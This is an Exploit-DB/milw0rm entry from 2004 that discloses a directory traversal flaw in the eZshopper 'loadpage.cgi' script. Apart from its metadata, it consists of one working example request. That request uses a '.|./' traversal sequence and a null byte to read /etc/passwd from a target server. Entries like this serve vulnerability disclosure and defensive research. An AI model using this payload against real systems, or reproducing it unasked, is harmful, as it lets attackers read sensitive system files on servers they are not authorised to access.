Alex Heiphetz Group eZshopper - 'loadpage.cgi' Directory Traversal

EDB-ID:

659


Author:

Zero X

Type:

webapps


Platform:

CGI

Date:

2004-11-25


Example:

http://targethost/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html

# milw0rm.com [2004-11-25]